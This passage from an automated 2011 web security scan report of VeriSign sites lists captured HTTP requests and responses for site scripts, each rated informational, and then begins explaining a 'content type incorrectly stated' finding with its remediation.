Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]...
22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
Request
GET /stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 22346 //////////////////////////////////// //Main JS functions for verisign.com //////////////////////////////////// function findObj(n, d){ var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&pa...[SNIP]...
22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
Request
GET /stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 3364 Content-Type: text/html ///////////////////////////////////////////////////////////////////////////// // Function : vrsnNavMenuElements // Comments : /////////////////////////////////////////////////////////////////////////...[SNIP]...
22.48. http://www.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMT Content-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMT Content-Type: text/html Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:18 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:18 GMT Content-Length: 1558 Content-Type: text/html /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:19 GMT Content-Type: text/html Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/authweb/global/assets/shared/images/favicon.ico
Request
GET /authweb/global/assets/shared/images/favicon.ico HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT Accept-Ranges: bytes Content-Length: 1150 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html ...[SNIP]...
22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/globals.js
Request
GET /authweb/global/assets/shared/js/globals.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 3608 Content-Type: text/html /******************************************* ** Utility functions ** *******************************************/ function linkPopUp(url) { popupWin = window.open...[SNIP]...
22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/jquery.boxshadow.js
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1538 Content-Type: text/html /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/jquery.cacheimage.js
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1356 Content-Type: text/html /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
Request
GET /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 15622 /* * FancyBox - jQuery Plugin * Simple and fancy lightbox alternative * * Examples and documentation at: http://fancybox.net * * Copyright (c) 2008 - 2010 Janis Skarnelis * That said, it is har...[SNIP]...
22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/jquery.hover_intent.js
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:17 GMT Content-Length: 1614 Content-Type: text/html /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/jquery.js
Request
GET /authweb/global/assets/shared/js/jquery.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:16 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:25:16 GMT Content-Type: text/html Content-Length: 78803 /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Incl...[SNIP]...
22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/rotator.custom.js
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 985 Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Length: 4102 Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
22.61. https://www.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /authweb/global/assets/shared/js/rotator.custom.js
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 985 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 4102 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
23. Content type incorrectly stated
There are 64 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7
Summary
Severity: Information
Confidence: Firm
Host: http://ak.c.ooyala.com
Path: /w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7
Issue detail
The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.
Request
